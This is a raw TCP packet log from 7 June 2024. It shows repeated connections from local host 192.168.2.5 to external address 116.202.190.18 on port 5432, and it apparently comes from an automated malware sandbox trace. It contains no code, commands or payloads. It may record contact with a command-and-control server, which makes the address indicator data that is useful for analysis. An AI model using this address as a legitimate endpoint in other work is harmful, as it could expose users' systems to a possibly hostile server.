Jun 7, 2024 17:21:10.054414988 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.069391966 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.070051908 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.074610949 CEST	5432	49709	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:10.074702024 CEST	49709	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.075190067 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:10.075259924 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.075542927 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.080343008 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:10.923140049 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:10.923269033 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.923600912 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.925312042 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:10.928489923 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:10.930213928 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:11.455221891 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:11.455261946 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:11.455355883 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:11.457024097 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:11.457264900 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:11.462129116 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:11.462217093 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:11.462248087 CEST	5432	49711	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:11.462414980 CEST	49711	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:11.462449074 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:11.467353106 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.323450089 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.323539972 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.324070930 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.326373100 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.329113960 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.331222057 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866233110 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866247892 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866254091 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866333961 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866343975 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866353035 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.866370916 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.866432905 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.868168116 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.868549109 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.873472929 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.873521090 CEST	5432	49712	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:12.873583078 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.873646021 CEST	49712	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.873819113 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:12.878635883 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:13.718590021 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:13.718652964 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:13.719084978 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:13.720568895 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:13.723927975 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:13.725425005 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:14.266201019 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:14.266385078 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:14.357431889 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:14.357848883 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:14.527355909 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:14.527515888 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:14.527756929 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:14.528611898 CEST	5432	49713	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:14.528687000 CEST	49713	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:14.532627106 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.349093914 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.349888086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.354581118 CEST	5432	49714	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.354655027 CEST	49714	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.354763985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.354840040 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.355216980 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.360069990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.401366949 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.401557922 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.402103901 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.403800011 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.403872013 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:15.407208920 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.408842087 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.408876896 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.408957005 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.409080029 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.409110069 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:15.409138918 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.058495045 CEST	5432	49715	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.058578014 CEST	49715	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.202840090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.202953100 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.203512907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.205812931 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.208551884 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.210735083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.453815937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.453850031 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.453903913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.453933954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.453938961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.453962088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.453974962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454013109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454026937 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454060078 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454082012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454082012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454092979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454109907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454145908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454181910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454205036 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454205036 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454211950 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.454231024 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.454315901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.459142923 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.459194899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.459280968 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.459333897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.459387064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.459464073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.572973013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.572994947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.573086023 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.577042103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.577073097 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.577090025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.577127934 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.577142954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.581170082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.581183910 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.581198931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.581213951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.581274033 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.581274033 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.589785099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.589803934 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.589818954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.589886904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.589886904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.598126888 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.598140001 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.598211050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.598222971 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.598223925 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.598280907 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.606453896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.606467962 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.606600046 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.610722065 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.610735893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.610800028 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.610810041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.610826969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.610882998 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.610943079 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.619360924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.619378090 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.619393110 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.619466066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.619466066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.627577066 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.627592087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.627608061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.627898932 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.636353970 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.636389971 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.636408091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.636671066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.644540071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.644573927 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.644592047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.645025969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.692190886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.692223072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.692240000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.692257881 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.692488909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.700078011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.700114012 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.700149059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.700169086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.700202942 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.700202942 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.703888893 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.703922987 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.703958035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.703969002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.703969002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.704014063 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.711708069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.711739063 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.711774111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.711774111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.711806059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.711824894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.711872101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.711872101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.719520092 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.719552994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.719595909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.719604969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.719614983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.719633102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.719661951 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.719677925 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.727418900 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.727449894 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.727499008 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.727499008 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.727504015 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.727533102 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.727576017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.727576017 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.735166073 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.735200882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.735234022 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.735290051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.735290051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.743036032 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.743067980 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.743123055 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.743144035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.743144035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.743151903 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.743187904 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.743324041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.750958920 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.750989914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.751030922 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.751041889 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.751049042 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.751070976 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.751115084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.751115084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.758676052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.758708954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.758754015 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.758763075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.758791924 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.758807898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.758807898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.758857012 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.766329050 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.766360998 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.766396999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.766411066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.766411066 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.766447067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.766449928 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.766516924 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.773731947 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.773768902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.773788929 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.773802996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.773859978 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.773886919 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.780235052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.780316114 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.780369997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.780373096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.780373096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.780400038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.780431986 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.780502081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.786550999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.786581993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.786622047 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.786636114 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.786650896 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.786695957 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.786722898 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.792905092 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.792937994 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.792973995 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.793016911 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.793024063 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.793044090 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.793112993 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.799287081 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.799323082 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.799355984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.799365997 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.799401999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.799401999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.805510998 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.805541992 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.805593967 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.805598021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.805598021 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.805624008 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.805670977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.805670977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.811799049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.811830997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.811861992 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.811873913 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.811883926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.811913013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.811942101 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.811969995 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.818202972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.818234921 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.818289042 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.818293095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.818293095 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.818316936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.818336964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.818368912 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.824559927 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.824589968 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.824635983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.824635983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.824642897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.824671984 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.824716091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.824716091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.828855038 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.828890085 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.828916073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.828923941 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.828937054 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.829015970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.832504034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.832540035 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:16.832571983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.832571983 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:16.832576990 CEST	5432	49716	116.202.190.18	192.168.2.5
